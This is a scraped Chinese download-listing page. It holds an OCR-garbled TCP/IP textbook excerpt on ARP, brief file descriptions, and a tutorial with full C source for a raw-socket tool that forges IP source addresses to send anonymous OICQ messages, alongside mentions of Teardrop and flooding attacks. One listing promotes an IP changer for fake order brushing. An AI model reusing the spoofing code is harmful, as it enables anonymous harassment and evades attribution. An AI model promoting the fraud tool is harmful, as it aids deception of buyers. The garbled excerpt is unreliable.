主 机 192.168,2066的 ARP表 显 示 出 多 个 lP叫 地 址 映 射 到 单 - MAC标 识符,这 说明正在使用代理ARP InterfaCe: 192 168.20 66 Internet Address Physical Address 192.168,20 17 oo~oo~9c-0aˉ 2aˉ a9 192,168.20,20 ooˉ 00ˉOCˉ 0a-2aˉ a9 192.168 20 25 oo~ooˉ oc~0aˉ 2aˉ a9 192∶ 168.20,65 ooˉ ⑦0ˉ0Cˉ 0aˉ 2cˉ 51 192.168,20.79 ooˉ 92ˉ67ˉ79ˉ 0fˉ 4C Type dynamic dynalrlic dynamic dyna|nic dyna|nic 在IOs系 统中,缺 省情况下代理ARP功 能是打开的,当 然也可以在每个接口上使用命 令 Ⅱo ip proxy-arp关 闭 此 功 能 。 l。4.2 无 故 ARP 主机偶尔也会使用自己的IPv4地 址作为目标地址发送ARP请 求。这种ARP请 求称为无 故ARP,主 要有两个用途: · 无 故ARP可 以用于检查重复地址。 一 台设备可以向自己的IPv4地 址发送ARP请 求, 如果收到ARP响 应则表明存在重复地址。 · 无 故ARP还 可以用于通告 一 个新的数据链路标识符。当 一 台设备收到 一 个ARP请 求,如 果ARP高 速缓冲中已有发送者的IPv4地 址,那 么与此IPv4地 址相对应的硬 件地址将会被发送者新的硬件地址所更新。这种无故ARP用 途正是基于此事实。 · 某 个子网内运行热备份路由器协议 (HsRP协 议)的 路由器如果从其他路由器变成 了主路由器,它 就会发出 一 个无故ARP来 更新该子网上主机的ARP缓 存。 许多IP实现中都没有实现无故ARP功 能,但 是读者应该知道它的存在。在IOs系 统中 缺省情况下是关闭的,但 可以通过命令Ⅱ gr时uItous~arps激活它。 1.4,3 反 向 ARP 代替映射硬件地址到已知IPv4地址,反 向ARP(RARP)可 以实现IPv4地 址到已知硬 件地址的映射。某些设备,如无盘工作站在启动时可能不知道自己启动时的IPv4地址。嵌入 这些设备固件中的RARP程 序可以允许它们发送ARP请 求,其 中硬件地址为设备的硬件编 入地址。RARP服 务器将会向这些设备回复相应的IPv4地址。 RARP在 很大程度上正在被动态主机配置协议 (DHCP)和 自举协议 (B00P)的 扩展 协议所替代,不 同于RARP,这 两种协议都可以提供IPv4地址以外的更多信息,而 且还可以 跨越本地数据链路。 本电子书仅限试看之用,禁止用于商业行为,并请于下载后24小时内删除,如您喜欢本书,请购买正版。若因私自散布造成法律问题,本人 概不负责! 本电子书仅限试看之用,禁止用于商业行为,并请于下载后24小时内删除,如您喜欢本书,请购买正版。若因私自散布造成法律问题,本人 概不负责!
2023-04-14 19:10:40 37.62MB TCP IP 路由
1
提出了一种本质安全型矿用IP广播对讲系统的设计方案,详细介绍了该系统的结构组成、主要功能和主要设备的设计。该系统基于煤矿现有的以太环网传输平台和TCP/IP协议,综合应用计算机、网络、VOIP、嵌入式系统等技术将语音信号转换成标准的IP包在以太网上传输,系统连接简单,布线方便,传输距离远,音质好,稳定可靠。该系统除具备传统的广播功能外,还可以实现双向扩音对讲功能,为煤矿安全生产调度、安全避险和应急救援提供了有力的保障。
2023-04-14 15:43:47 416KB 煤矿通信 扩音广播 对讲系统 IP电话
1
悟空换IP助手是一款秒换国内和世界各地IP的软件,无论你是网上兼职做任务,还是玩游戏,还是经营淘宝刷单,以及博客留言装大神,等等,软件不限xp,win7,win8,系统,不限你是路由器
2023-04-14 12:16:31 1.5MB IP助手 悟空自动换IP软件 v1.5
1
本文介绍了基于Xilinx Vivado的DDR3 IP核扩展IP FDMA的使用详解。FDMA是一个定制的DMA控制器,基于AXI4总线协议。本文主要从IP的设置和使用两个方面进行了详细介绍,使读者能够更好地理解和应用该IP。通过使用FDMA IP,我们可以实现用FPGA代码直接控制DDR3存储器,从而提高系统性能。
2023-04-14 10:41:34 568KB
1
网狐服务端配置工具:IP配置器Collocate.exe, 不含任何木马
2023-04-13 21:46:34 1.19MB 网狐 配置器
1
geoip2 离线库 实现 IP 转换成现实地理位置
1
华三(H3C)策略路由NQA多出口联动配置,nqa类似ip sla,文档里描述详细,谁用谁知道。
2023-04-11 10:59:22 2KB sla nqa h3c 策略路由
1
DDR3 7系列IP手册和DDR3标准
2023-04-11 10:44:02 14.93MB ddr MIG
1
易语言取外网IP地址源码系统结构:易语言取外网IP地址源码,取外网IP地址 ======窗口程序集1 || ||------_按钮1_被单击 || ||------_按钮2_被单击 || ||------_按钮3_被单击 || ||------_按钮4_被单击 |
1
我们知道,TCP/IP网络数据全部是通过封装在IP数据包中在Internet网上传送的,也就是封装建立起一个包含IP头和数据的IP数据报。一般来说,网络软件总是以多个32位字产生IP头,即使必须用附加的0填充IP头。IP头包含了传输IP数据包中封装数据的所有必要信息。IP头的数据结构和描述如下: 成员 长度(Bit) 描述 Version 4 IP头的版本号,目前是IPv4,最新是IPv6 Header Length 4 IP头的长度,若没有特殊选择,IP头总是20字节长 Type of Service 8 服务类型,定义了数据传输的优先级、延迟、吞吐量和可靠性等特性 Total Packet Length 16 IP包的长度,若没有特殊选项,一般为20字节长 Identification 16 IP包标识,主机使用它唯一确定每个发送的数据报 Flag 3 IP数据分割标志 Fragment Offset 13 IP数据分割偏移 Time to Live 8 数据报在网络上的存活时间,每通过一个路由器,该数值减一 Protocol 8 TCP/IP协议类型,比如:ICMP为1,IGMP为2,TCP为6,UDP为17等 Header Checksum 16 头部检验和 Source IP Address 32 源IP地址 Destination IP Address 32 目的IP地址 Other ? 其他选项 Data ? 数据    实现自己定义的IP头是一件非常有意义的事情,比如,通过改变IP头里的TOS的优先级和TTL,你可以使自己的数据包有更强的传输能力和寿命,通过修改IP头里的源IP地址就可以隐藏自己机器的IP地址等等。象著名攻击程序“泪滴TearDrop”就是通过故意制造系统不能处理的分片IP包而实现的,还有SYN Flooder和UDP Flooder就是通过产生随机源IP实现欺骗的。 三、实现原理    一般来说,自定义IP头是通过使用socket的库函数setsockopt()的选项IP_HDRINCL来实现的,尽管这在unix和linux平台上很容易实现,但遗憾的是在Windows平台的Winsock1.1和Winsock2.0函数库里setsockopt()不支持IP_HDRINCL选项,所以在Windows 9x/NT里是无法通过Winsock函数库来实现IP头自定义的,当然可以通过编写虚拟设备驱动程序来实现,不过比较复杂,但Windows 2000的出现打破了这种局面,Windows2000的Winsock2.2函数库里全面支持setsockopt()的选项IP_HDRINCL,使得我们轻松就可以实现自定义的IP头。实现方法如下: SOCKET s; BOOL bopt; s=WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED); ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)bopt, sizeof(bopt); 四、实例   为帮助大家尽快地学会构造自己的IP头数据,特给出一个完整的实例,例子的功能是:只要给出对方的IP地址,就可以发送给对方的OICQ一个“hello!”消息,并且由于修改了发送数据包的IP头,完全实现了发送方IP地址的隐藏,也就是说稍加修改你就可以制作出一个能够完完全全的匿名OICQ发送器,当然,若是故意捣乱的话,后果自负。源代码如下: /***********************************************************************/ /* OicqSend.c                                            */ /* 本程序用Visual C++ 6.0编译在Windows 2000 Advanced Server 上调试通过 */ /* Created by janker@371.net 2000.8.28                         */ /* 声明:本程序经修改后可能会产生攻击性擅自修改成攻击程序者后果自负  */ /***********************************************************************/ #pragma pack(1) #define WIN32_LEAN_AND_MEAN #include #include #include #include #include #define OICQ_MAX_PACKET 1024 #define OICQ_MAX_MSG 512 #define OICQ_MSG_LEN 45 #define SRC_IP "127.0.0.1" #define SRC_PORT 5277 #define DST_PORT 4000 typedef struct ip_hdr { unsigned char ip_verlen; unsigned char ip_tos; unsigned short ip_totallength; unsigned short ip_id; unsigned short ip_offset; unsigned char ip_ttl; unsigned char ip_protocol; unsigned short ip_checksum; unsigned int ip_srcaddr; unsigned int ip_destaddr; } IP_HDR; typedef struct udp_hdr { unsigned short src_portno; unsigned short dst_portno; unsigned short udp_length; unsigned short udp_checksum; } UDP_HDR; char strMessage[OICQ_MSG_LEN] = { 0x02,0x01,0x07,0x00,0x78,0x00,0x00,0x31,0x30,0x30,0x30,0x31,0x1f,0x30,0x1f, 0x30,0x30,0x1f,0x32,0x30,0x30,0x30,0x2d,0x30,0x31,0x2d,0x30,0x31,0x1f,0x30, 0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x1f,0x68,0x65,0x6c,0x6c,0x6f,0x21,0x03 }; USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } int main(int argc, char **argv) { WSADATA wsd; SOCKET s; BOOL bOpt; struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; DWORD i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf[OICQ_MAX_PACKET], *ptr = NULL; printf("Spoof OICQ Msg Sender - by Janker@371.net\n\n"); if(argc!=2) { printf("usage: OICQSEND Destination_IP_Address"); ExitProcess(1); } srand((unsigned)time(NULL)); strMessage[5]=rand(); if (WSAStartup(MAKEWORD(2,2), &wsd;) != 0) { printf("WSAStartup() failed: %d\n", GetLastError()); return -1; } s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0,0); if (s == INVALID_SOCKET) { printf("WSASocket() failed: %d\n", WSAGetLastError()); return -1; } bOpt = TRUE; ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt;, sizeof(bOpt)); if (ret == SOCKET_ERROR) { printf("setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + OICQ_MSG_LEN; iIPVersion = 4; iIPSize = sizeof(ipHdr) / sizeof(unsigned long); ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; ipHdr.ip_totallength = htons(iTotalSize); ipHdr.ip_id = 0; ipHdr.ip_offset = 0; ipHdr.ip_ttl = 128; ipHdr.ip_protocol = 0x11; ipHdr.ip_checksum = 0 ; ipHdr.ip_srcaddr = inet_addr(SRC_IP); ipHdr.ip_destaddr = inet_addr(argv[1]); iUdpSize = sizeof(udpHdr) + OICQ_MSG_LEN; udpHdr.src_portno = htons(SRC_PORT) ; udpHdr.dst_portno = htons(DST_PORT) ; udpHdr.udp_length = htons(iUdpSize) ; udpHdr.udp_checksum = 0 ; iUdpChecksumSize = 0; ptr = buf; ZeroMemory(buf, OICQ_MAX_PACKET); memcpy(ptr, &ipHdr;.ip_srcaddr, sizeof(ipHdr.ip_srcaddr)); ptr += sizeof(ipHdr.ip_srcaddr); iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr); memcpy(ptr, &ipHdr;.ip_destaddr, sizeof(ipHdr.ip_destaddr)); ptr += sizeof(ipHdr.ip_destaddr); iUdpChecksumSize += sizeof(ipHdr.ip_destaddr); ptr++; iUdpChecksumSize += 1; memcpy(ptr, &ipHdr;.ip_protocol, sizeof(ipHdr.ip_protocol)); ptr += sizeof(ipHdr.ip_protocol); iUdpChecksumSize += sizeof(ipHdr.ip_protocol); memcpy(ptr, &udpHdr;.udp_length, sizeof(udpHdr.udp_length)); ptr += sizeof(udpHdr.udp_length); iUdpChecksumSize += sizeof(udpHdr.udp_length); memcpy(ptr, &udpHdr;, sizeof(udpHdr)); ptr += sizeof(udpHdr); iUdpChecksumSize += sizeof(udpHdr); for(i = 0; i *ptr = strMessage[i]; iUdpChecksumSize += OICQ_MSG_LEN; cksum = checksum((USHORT *)buf, iUdpChecksumSize); udpHdr.udp_checksum = cksum; ZeroMemory(buf, OICQ_MAX_PACKET); ptr = buf; memcpy(ptr, &ipHdr;, sizeof(ipHdr)); ptr += sizeof(ipHdr); memcpy(ptr, &udpHdr;, sizeof(udpHdr)); ptr += sizeof(udpHdr); memcpy(ptr, strMessage, OICQ_MSG_LEN); remote.sin_family = AF_INET; remote.sin_port = htons(DST_PORT); remote.sin_addr.s_addr = inet_addr(argv[1]); ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote;, sizeof(remote)); if (ret == SOCKET_ERROR) printf("sendto() failed: %d\n", WSAGetLastError()); else printf("Send O.K.!"); closesocket(s) ; WSACleanup() ; return 0; }
2023-04-10 15:50:57 10KB ip仿造
1